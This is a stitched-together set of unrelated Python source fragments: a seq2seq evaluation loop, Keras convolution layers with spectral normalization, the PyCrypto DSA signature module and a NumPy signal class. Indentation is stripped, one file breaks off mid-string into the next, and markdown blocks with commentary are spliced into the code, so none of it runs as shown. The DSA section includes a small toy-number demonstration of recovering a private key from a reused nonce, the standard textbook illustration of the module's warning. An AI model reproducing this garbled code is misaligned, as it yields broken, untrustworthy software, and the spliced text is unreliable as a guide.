fout=open(os.path.join(args.output_dir,"dev.res"),'w',encoding='utf-8')
fdebug=open(os.path.join(args.output_dir,"dev.debug.res"),'w',encoding='utf-8')
for batch in tqdm(eval_dataloader, desc="Evaluating"):
source, target, encoder_mask, decoder_mask, lm_labels = batch
#print('[SOURCE]: {}'.format(source))
#print('[TARGET]: {}'.format(target))
#source = source.to(args.device)
#target = target.to(args.device)
#encoder_mask = encoder_mask.to(args.device)
#decoder_mask = decoder_mask.to(args.device)
#lm_labels = lm_labels.to(args.device)
feed_source = None
feed_targets = [None] * len(target)
feed_encoder_mask = None
feed_decoder_masks = [None] * len(decoder_mask)
feed_lm_labels = [None] * len(lm_labels)
feed_source = source.to(args.device)
for i in range(len(target)):
feed_targets[i] = target[i].to(args.device)
feed_encoder_mask = encoder_mask.to(args.device)
for i in range(len(decoder_mask)):
feed_decoder_masks[i] = decoder_mask[i].to(args.device)
for i in range(len(lm_labels)):
feed_lm_labels[i] = lm_labels[i].to(args.device)
with torch.no_grad():
if args.decoding_type=='decoding':
tokens_roles=[]
for i in range(len(feed_targets)):
outputs_ids=model.decoding(
feed_source,
feed_targets[i],
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks[i],
decoder_lm_labels=feed_lm_labels[i],
decoder=model.decoders[i]
#fdebug=fdebug,
)
print('outputs size: {}'.format(outputs_ids.size()))
outputs_ids =outputs_ids.cpu().numpy()
batch_tokens=[]
for idx in outputs_ids:
tokens = []
for id in idx:
#print('{}\t{}'.format(id,type(id)))
tokens.append(tokenizer.ids_to_tokens.get(int(id), tokenizer.unk_token))
batch_tokens.append(tokens)
tokens_roles.append(batch_tokens)
def subtoken2token(subtokens):
token=""
tokens=[]
for subtoken in subtokens:
if subtoken.startswith("##"):
token+=subtoken[2:]
else:
if token!="":
tokens.append(token)
token=subtoken
if token!="":
tokens.append(token)
return tokens
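# The inline subtoken2token above undoes WordPiece splitting by gluing "##"
# continuation pieces onto the preceding token. A standalone copy for
# illustration:

```python
def merge_wordpieces(subtokens):
    # Join "##"-prefixed continuation pieces onto the token they extend.
    token = ""
    tokens = []
    for subtoken in subtokens:
        if subtoken.startswith("##"):
            token += subtoken[2:]
        else:
            if token != "":
                tokens.append(token)
            token = subtoken
    if token != "":
        tokens.append(token)
    return tokens

merged = merge_wordpieces(["the", "mol", "##ar", "mass", "of", "h", "##2", "##o"])
```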
for i in range(len(tokens_roles[0])):
fout.write('\t'.join([' '.join(subtoken2token(tokens_roles[0][i]))
,' '.join(subtoken2token(tokens_roles[1][i]))]) + '\n')
else:
print('debug eva input:')
print('feed_source={}'.format(feed_source))
print('feed_targets={}'.format(feed_targets))
print('feed_encoder_mask={}'.format(feed_encoder_mask))
print('feed_decoder_masks={}'.format(feed_decoder_masks))
print('feed_lm_labels={}'.format(feed_lm_labels))
outputs = model(
feed_source,
feed_targets,
encoder_attention_mask=feed_encoder_mask,
decoder_attention_mask=feed_decoder_masks,
decoder_lm_labels=feed_lm_labels,
#fdebug=fdebug,
)
ans_seqs=[[],[]]
for i in range(len(model.decoders)):
print(outputs[i][1].size())
predicted_scores=outputs[i][1].argmax(-1).cpu().numpy().tolist()
for idx in predicted_scores:
tokens = []
for id in idx:
tokens.append(tokenizer.ids_to_tokens.get(id, tokenizer.unk_token))
ans_seqs[i].append(tokens)
for i in range(len(ans_seqs[0])):
fout.write('\t'.join([' '.join(ans_seqs[0][i]),' '.join(ans_seqs[1][i])]) + '\n')
# print('debug by zhuoyu, predicted_scores size={}'.format(predicted_scores.size()))
#eval_loss += lm_loss.mean().item()
nb_eval_steps += 1
eval_loss = eval_loss / nb_eval_steps
perplexity = torch.exp(torch.tensor(eval_loss))
result = {"perplexity": perplexity}
# Save the evaluation's results
output_eval_file = os.path.join(args.output_dir, "eval_results.txt")
if not os.path.exists(args.output_dir):
os.makedirs(args.output_dir)
with open(output_eval_file, "w") as writer:
logger.info("***** Eval results {} *****".format(prefix))
for key in sorted(result.keys()):
logger.info(" %s = %s", key, str(result[key]))
writer.write("%s = %s\n" % (key, str(result[key])))
#with open(os.path.join(args.output_dir,"dev.res"),'w',encoding='utf-8') as fout:
fout.flush()
fout.close()
fdebug.flush()
fdebug.close()
return result
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=True,
help="The input training data file (a text file).",
)
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.",
)
# Optional parameters
parser.add_argument(
"--gradient_accumulation_steps",
type=int,
default=1,
help="Number of updates steps to accumulate before performing a backward/update pass.",
)
parser.add_argument(
"--do_evaluate",
action="store_true",
help="Run model evaluation on out-of-sample data.",
)
parser.add_argument("--do_train", action="store_true", help="Run training.")
parser.add_argument(
"--do_overwrite_output_dir",
action="store_true",
help="Whether to overwrite the output dir.",
)
parser.add_argument(
"--encoder_model_name_or_path",
default="bert-base-cased",
type=str,
help="The model checkpoint to initialize the encoder's weights with.",
)
parser.add_argument(
"--decoder_model_name_or_path",
default="/data/zhuoyu/semantic_parsing/models",
type=str,
help="The model checkpoint to initialize the decoder's weights with.",
)
parser.add_argument(
"--model_type",
default="bert",
type=str,
help="The decoder architecture to be fine-tuned.",
)
parser.add_argument(
"--max_grad_norm", default=1.0, type=float, help="Max gradient norm."
)
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument(
"--to_cpu", default=False, type=bool, help="Whether to force
#!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import nn
from tensorflow.python.eager import context
from tensorflow.python.layers import utils
from tensorflow.python.layers import convolutional as tf_convolutional_layers
from tensorflow.python.util.tf_export import tf_export
from tensorflow.keras import activations
from tensorflow.keras import backend as K
from tensorflow.keras import constraints
from tensorflow.keras import initializers
from tensorflow.keras import regularizers
from tensorflow.keras.layers import Layer
from tensorflow.python.layers import core
from tensorflow.python.framework import ops
from tensorflow.python.ops import standard_ops
from tensorflow.python.ops import gen_math_ops
def _l2normalizer(v, epsilon=1e-12):
return v / (K.sum(v ** 2) ** 0.5 + epsilon)
def power_iteration(W, u, rounds=1):
"""
According to the paper, a single round of power iteration is sufficient.
"""
_u = u
for i in range(rounds):
_v = _l2normalizer(K.dot(_u, W))
_u = _l2normalizer(K.dot(_v, K.transpose(W)))
W_sn = K.sum(K.dot(_u, W) * _v)
return W_sn, _u, _v
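# The estimate from power_iteration can be sanity-checked against a full SVD;
# a NumPy sketch of the same update (hypothetical helper names):

```python
import numpy as np

def l2normalize(v, eps=1e-12):
    # Same normalization as _l2normalizer above, in NumPy.
    return v / (np.sqrt(np.sum(v ** 2)) + eps)

def power_iteration_np(W, u, rounds=1):
    # W: [out, N], u: [1, out]; mirrors the Keras version above.
    for _ in range(rounds):
        v = l2normalize(u @ W)            # [1, N]
        u = l2normalize(v @ W.T)          # [1, out]
    sigma = float(np.sum((u @ W) * v))    # estimated largest singular value
    return sigma, u, v

rng = np.random.default_rng(0)
W = rng.normal(size=(4, 16))
u0 = rng.normal(size=(1, 4))
sigma, u, v = power_iteration_np(W, u0, rounds=50)
largest_sv = float(np.linalg.svd(W, compute_uv=False)[0])
```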
@tf_export('keras.layers.Conv2D', 'keras.layers.Convolution2D')
class Conv2D(tf_convolutional_layers.Conv2D, Layer):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
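# The new_rows/new_cols in the output shape above follow standard convolution
# arithmetic for the "same" and "valid" padding modes; a quick sketch
# (hypothetical helper, plain Python):

```python
import math

def conv_output_length(input_len, kernel_size, stride, padding, dilation=1):
    # Effective kernel size grows with dilation; "same" output length
    # depends only on the stride.
    effective_k = kernel_size + (kernel_size - 1) * (dilation - 1)
    if padding == "same":
        return math.ceil(input_len / stride)
    if padding == "valid":
        return math.ceil((input_len - effective_k + 1) / stride)
    raise ValueError("unknown padding: %r" % padding)

rows_same = conv_output_length(128, kernel_size=3, stride=2, padding="same")
rows_valid = conv_output_length(128, kernel_size=3, stride=1, padding="valid")
```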
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
spectral_normalization=True,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
tf.logging.info("CONV: Using Spectral Norm!")
self.u = K.random_normal_variable([1, filters], 0, 1, dtype=self.dtype, name="sn_estimate") # [1, out_channels]
self.spectral_normalization = spectral_normalization
def compute_spectral_normal(self, training=True):
# Spectrally Normalized Weight
if self.spectral_normalization:
# Get kernel tensor shape [kernel_h, kernel_w, in_channels, out_channels]
W_shape = self.kernel.shape.as_list()
# Flatten to [N, out_channels] and transpose so rows index output filters;
# a direct reshape to [out_channels, -1] would scramble the per-filter weights.
W_mat = K.transpose(K.reshape(self.kernel, [-1, W_shape[-1]])) # [out_channels, N]
W_sn, u, v = power_iteration(W_mat, self.u)
if training:
# Update estimated 1st singular vector
self.u.assign(u)
return self.kernel / W_sn
else:
return self.kernel
def call(self, inputs, training=None):
outputs = K.conv2d(
inputs,
self.compute_spectral_normal(training),
strides=self.strides,
padding=self.padding,
data_format=self.data_format,
dilation_rate=self.dilation_rate)
if self.bias is not None:
outputs = K.bias_add(
outputs,
self.bias,
data_format=self.data_format)
if self.activation is not None:
return self.activation(outputs)
return outputs
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
@tf_export('keras.layers.Conv2DTranspose',
'keras.layers.Convolution2DTranspose')
class Conv2DTranspose(tf_convolutional_layers.Conv2DTranspose, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(i.e. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
spectral_normalization=True,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
self.spectral_normalization = spectral_normalization
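For reference, the spatial size a transposed convolution produces follows the usual Keras deconvolution length rule. The sketch below is a hedged restatement of that arithmetic, not code from the layer above:

```python
# Output length of a transposed convolution along one spatial axis,
# mirroring the usual Keras deconvolution rule (assumption: only the
# 'same' and 'valid' padding modes of the layer above are covered).
def deconv_output_length(input_length, kernel_size, padding, stride):
    if padding == 'same':
        return input_length * stride
    if padding == 'valid':
        return input_length * stride + max(kernel_size - stride, 0)
    raise ValueError('unknown padding: {!r}'.format(padding))
```

For example, a 4-wide input with a 3-wide kernel and stride 2 upsamples to 9 with `'valid'` padding and to 8 with `'same'`.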
# -*- coding: utf-8 -*-
#
# PublicKey/DSA.py : DSA signature primitive
#
# Written in 2008 by <NAME> <<EMAIL>>
#
# ===================================================================
# The contents of this file are dedicated to the public domain. To
# the extent that dedication to the public domain is not available,
# everyone is granted a worldwide, perpetual, royalty-free,
# non-exclusive license to exercise all rights associated with the
# contents of this file for any purpose whatsoever.
# No rights are reserved.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ===================================================================
"""DSA public-key signature algorithm.
DSA_ is a widespread public-key signature algorithm. Its security is
based on the discrete logarithm problem (DLP_). Given a cyclic
group, a generator *g*, and an element *h*, it is hard
to find an integer *x* such that *g^x = h*. The problem is believed
to be difficult, and it has withstood attack (and therefore kept DSA secure)
for more than 30 years.
The group is actually a sub-group over the integers modulo *p*, with *p* prime.
The sub-group order is *q*, which is prime too; it always holds that *(p-1)* is a multiple of *q*.
The cryptographic strength is linked to the magnitude of *p* and *q*.
The signer holds a value *x* (*0<x<q-1*) as private key, and its public
key (*y* where *y=g^x mod p*) is distributed.
In 2012, a sufficient size is deemed to be 2048 bits for *p* and 256 bits for *q*.
For more information, see the most recent ECRYPT_ report.
DSA is reasonably secure for new designs.
The algorithm can only be used for authentication (digital signature).
DSA cannot be used for confidentiality (encryption).
The values *(p,q,g)* are called *domain parameters*;
they are not sensitive but must be shared by both parties (the signer and the verifier).
Different signers can share the same domain parameters with no security
concerns.
The DSA signature is twice as big as the size of *q* (64 bytes if *q* is 256 bit
long).
This module provides facilities for generating new DSA keys and for constructing
them from known components. DSA keys allow you to perform basic signing and
verification.
>>> from Crypto.Random import random
>>> from Crypto.PublicKey import DSA
>>> from Crypto.Hash import SHA
>>>
>>> message = "Hello"
>>> key = DSA.generate(1024)
>>> h = SHA.new(message).digest()
>>> k = random.StrongRandom().randint(1,key.q-1)
>>> sig = key.sign(h,k)
>>> ...
>>> if key.verify(h,sig):
...     print "OK"
... else:
...     print "Incorrect signature"
.. _DSA: http://en.wikipedia.org/wiki/Digital_Signature_Algorithm
.. _DLP: http://www.cosic.esat.kuleuven.be/publications/talk-78.pdf
.. _ECRYPT: http://www.ecrypt.eu.org/documents/D.SPA.17.pdf
"""
__revision__ = "$Id$"
__all__ = ['generate', 'construct', 'error', 'DSAImplementation', '_DSAobj']
import sys
if sys.version_info[0] == 2 and sys.version_info[1] == 1:
from Crypto.Util.py21compat import *
from Crypto.PublicKey import _DSA, _slowmath, pubkey
from Crypto import Random
try:
from Crypto.PublicKey import _fastmath
except ImportError:
_fastmath = None
class _DSAobj(pubkey.pubkey):
"""Class defining an actual DSA key.
:undocumented: __getstate__, __setstate__, __repr__, __getattr__
"""
#: Dictionary of DSA parameters.
#:
#: A public key will only have the following entries:
#:
#: - **y**, the public key.
#: - **g**, the generator.
#: - **p**, the modulus.
#: - **q**, the order of the sub-group.
#:
#: A private key will also have:
#:
#: - **x**, the private key.
keydata = ['y', 'g', 'p', 'q', 'x']
def __init__(self, implementation, key):
self.implementation = implementation
self.key = key
def __getattr__(self, attrname):
if attrname in self.keydata:
# For backward compatibility, allow the user to get (not set) the
# DSA key parameters directly from this object.
return getattr(self.key, attrname)
else:
raise AttributeError("%s object has no %r attribute" % (self.__class__.__name__, attrname,))
def sign(self, M, K):
"""Sign a piece of data with DSA.
:Parameter M: The piece of data to sign with DSA. It may
not be longer in bit size than the sub-group order (*q*).
:Type M: byte string or long
:Parameter K: A secret number, chosen randomly in the closed
range *[1,q-1]*.
:Type K: long (recommended) or byte string (not recommended)
:attention: selection of *K* is crucial for security. Generating a
random number larger than *q* and taking the modulus by *q* is
**not** secure, since smaller values will occur more frequently.
Generating a random number systematically smaller than *q-1*
(e.g. *floor((q-1)/8)* random bytes) is also **not** secure. In general,
it shall not be possible for an attacker to know the value of `any
bit of K`__.
:attention: The number *K* shall not be reused for any other
operation and shall be discarded immediately.
:attention: M must be the digest of a cryptographic hash, otherwise
an attacker may mount an existential forgery attack.
:Return: A tuple with 2 longs.
.. __: http://www.di.ens.fr/~pnguyen/pub_NgSh00.htm
"""
return pubkey.pubkey.sign(self, M, K)
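The warning about *K* above is not theoretical: two signatures made with the same *K* leak the private key. A sketch with the same kind of toy-size numbers (`p=23, q=11, g=2`, illustration only):

```python
# If the same nonce k signs two different digests h1 and h2, both r
# values coincide and an attacker can solve for k, then for the key x:
#   k = (h1 - h2) / (s1 - s2) mod q,  x = (s1*k - h1) / r mod q
def recover_from_nonce_reuse(h1, s1, h2, s2, r, q):
    k = (h1 - h2) * pow(s1 - s2, -1, q) % q
    x = (s1 * k - h1) * pow(r, -1, q) % q
    return k, x

p, q, g, x, k = 23, 11, 2, 6, 5
r = pow(g, k, p) % q
s1 = pow(k, -1, q) * (3 + x * r) % q    # signs digest h1 = 3
s2 = pow(k, -1, q) * (10 + x * r) % q   # signs digest h2 = 10, same k!
```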
def verify(self, M, signature):
"""Verify the validity of a DSA signature.
:Parameter M: The expected message.
:Type M: byte string or long
:Parameter signature: The DSA signature to verify.
:Type signature: A tuple with 2 longs as returned by `sign`
:Return: True if the signature is correct, False otherwise.
"""
return pubkey.pubkey.verify(self, M, signature)
def _encrypt(self, c, K):
raise TypeError("DSA cannot encrypt")
def _decrypt(self, c):
raise TypeError("DSA cannot decrypt")
def _blind(self, m, r):
raise TypeError("DSA cannot blind")
def _unblind(self, m, r):
raise TypeError("DSA cannot unblind")
def _sign(self, m, k):
return self.key._sign(m, k)
def _verify(self, m, sig):
(r, s) = sig
return self.key._verify(m, r, s)
def has_private(self):
return self.key.has_private()
def size(self):
return self.key.size()
def can_blind(self):
return False
def can_encrypt(self):
return False
def can_sign(self):
return True
def publickey(self):
return self.implementation.construct((self.key.y, self.key.g, self.key.p, self.key.q))
def __getstate__(self):
d = {}
for k in self.keydata:
try:
d[k] = getattr(self.key, k)
except AttributeError:
pass
return d
def __setstate__(self, d):
if not hasattr(self, 'implementation'):
self.implementation = DSAImplementation()
t = []
for k in self.keydata:
if not d.has_key(k):
break
t.append(d[k])
self.key = self.implementation._math.dsa_construct(*tuple(t))
def __repr__(self):
attrs = []
for k in self.keydata:
if k == 'p':
attrs.append("p(%d)" % (self.size()+1,))
elif hasattr(self.key, k):
attrs.append(k)
if self.has_private():
attrs.append("private")
# PY3K: This is meant to be text, do not change to bytes (data)
return "<%s @0x%x %s>" % (self.__class__.__name__, id(self), ",".join(attrs))
class DSAImplementation(object):
"""
A DSA key factory.
This class is only internally used to implement the methods of the
`Crypto.PublicKey.DSA` module.
"""
def __init__(self, **kwargs):
"""Create a new DSA key factory.
:Keywords:
use_fast_math : bool
Specify which mathematic library to use:
- *None* (default). Use fastest math available.
- *True* . Use fast math.
- *False* . Use slow math.
default_randfunc : callable
Specify how to collect random data:
- *None* (default). Use Random.new().read().
- not *None* . Use the specified function directly.
:Raise RuntimeError:
When **use_fast_math** =True but fast math is not available.
"""
use_fast_math = kwargs.get('use_fast_math', None)
if use_fast_math is None: # Automatic
if _fastmath is not None:
self._math = _fastmath
else:
self._math = _slowmath
elif use_fast_math: # Explicitly select fast math
if _fastmath is not None:
self._math = _fastmath
else:
raise RuntimeError("fast math module not available")
else: # Explicitly select slow math
self._math = _slowmath
self.error = self._math.error
# 'default_randfunc' parameter:
# None (default) - use Random.new().read
# not None - use the specified function
self._default_randfunc = kwargs.get('default_randfunc', None)
self._current_randfunc = None
def _get_randfunc(self, randfunc):
if randfunc is not None:
return randfunc
elif self._current_randfunc is None:
self._current_randfunc = Random.new().read
return self._current_randfunc
def generate(self, bits, randfunc=None, progress_func=None):
"""Randomly generate a fresh, new DSA key.
:Parameters:
bits : int
Key length, or size (in bits) of the DSA modulus
*p*.
It must be a multiple of 64, in the closed
interval [512,1024].
randfunc : callable
Random number generation function; it should accept
a single integer N and return a string of random data
N bytes long.
If not specified, a new one will be instantiated
from ``Crypto.Random``.
progress_func : callable
Optional function that will be called with a short string
containing the | |
from copy import copy
import pandas as pd
import numpy as np
from cached_property import cached_property
from hashlib import md5
from .utils import integral_trapz
from .core_utils import IdentifedObject, IdentifedCachedObject
# register signal name dictionary
global __signal_names__
__signal_names__ = {}
def get_signal_names():
"""
Access global signal name dictionary.
Returns
-------
global signal name dictionary: dict
"""
return globals()['__signal_names__']
class CoreSingleSignal(IdentifedCachedObject):
def __init__(self, t: np.ndarray = None, y: np.ndarray = None, name: str = None, listed=True, **kwargs):
"""
core class for single signals
Parameters
----------
t: ndarray
time points
y: ndarray
Values corresponding to the time points t.
name: str or None, optional
Name for the signal that will be registered in the global signal name dictionary if the parameter "listed"
is True. If None, a unique generic signal name will be generated.
listed: bool, optional
If True the signal will be registered in the global signal name dictionary. Default is True.
"""
super(CoreSingleSignal, self).__init__(**kwargs)
self._y = None
self._t = None
self.register_cached_property('dydt')
self.register_cached_property('d2ydt2')
self.register_cached_property('integral')
self.register_cached_property('sign_change_y')
self.register_cached_property('sign_change_dydt')
self.register_cached_property('sign_change_d2ydt2')
self.set_y(y)
self.set_t(t)
self._name = self._gen_name(name)
if listed:
if self._name in __signal_names__:
if __signal_names__[self._name] != self.get_hash():
raise NameError('"{}" already registered as different Signal!'.format(self._name))
else:
__signal_names__.update({self._name: self.get_hash()})
def __len__(self):
return len(self.y)
def _gen_name(self, name: str = None):
"""
Generate object name.
Parameters
----------
name: str or None
Custom object name.
Returns
-------
generated object name: str
"""
if name is None:
return '{}_{}'.format(self.__class__.__name__, self.__identifier__)
else:
return name
def get_hash(self):
"""
Get object hash value.
Returns
-------
hash value: str
"""
m = md5()
m.update("{0:s}-{1:s}-{2:s}-{3:s}".format(
str(self._t),
str(self._y),
str(self.__identifier__),
str(self.__creation_date__)
).encode())
return m.hexdigest()
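The name-registration check in `__init__` above compares content hashes, so re-registering an identical signal is a no-op while a name collision with different content fails. Sketched standalone (`content_hash` and `register` are illustrative helpers in the spirit of `get_hash`):

```python
from hashlib import md5

def content_hash(*fields):
    # same idea as get_hash above: digest the stringified fields
    m = md5()
    m.update('-'.join(str(f) for f in fields).encode())
    return m.hexdigest()

signal_names = {}

def register(name, digest):
    # identical re-registration is fine; a clash with different content fails
    if name in signal_names and signal_names[name] != digest:
        raise NameError('"{}" already registered as different Signal!'.format(name))
    signal_names[name] = digest

register('pressure', content_hash([0, 1], [2.0, 3.0]))
register('pressure', content_hash([0, 1], [2.0, 3.0]))  # same content: no-op
```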
def set_y(self, y: np.ndarray):
"""
Set signal values.
Parameters
----------
y: ndarray
"""
self.del_cache()
self._y = y
@property
def y(self):
"""
Returns
-------
signal values: ndarray
"""
return self._y
@y.setter
def y(self, value):
"""
Set signal values.
Parameters
----------
value: ndarray
"""
self.set_y(value)
def set_t(self, t: np.ndarray):
"""
Set signal time points.
Parameters
----------
t: ndarray
"""
self.del_cache()
self._t = t
@property
def t(self):
"""
Returns
-------
signal time points: ndarray
"""
return self._t
@t.setter
def t(self, value):
"""
Set signal time points.
Parameters
----------
value: ndarray
"""
self.set_t(value)
@property
def fs(self):
"""
Returns
-------
fs: float
"""
return np.median(1/np.diff(self.t))
@property
def name(self):
"""
Returns
-------
signal name: str
"""
return self._name
@property
def data(self):
"""
Returns
-------
data array [t, y]: ndarray
"""
return np.array((self.t, self.y)).T
def _time_derivate(self, data: np.ndarray):
"""
Calculate a simple forward-difference time derivative of a data array.
Parameters
----------
data: ndarray
Returns
-------
time derivative: ndarray
"""
return np.array([0] + list(np.diff(data) / np.diff(self.t)))
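On a known function the forward-difference rule of `_time_derivate` is easy to check by hand; for a quadratic it returns the slope over each preceding interval, padded with a leading zero:

```python
import numpy as np

t = np.array([0.0, 0.5, 1.0, 1.5])
y = t ** 2
# forward difference padded with a leading 0, exactly as _time_derivate does
dydt = np.array([0] + list(np.diff(y) / np.diff(t)))
```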
@cached_property
def dydt(self):
"""
Calculate dy/dt. The values will be cached.
Returns
-------
dy/dt: ndarray
"""
return self._time_derivate(self.y)
@cached_property
def d2ydt2(self):
"""
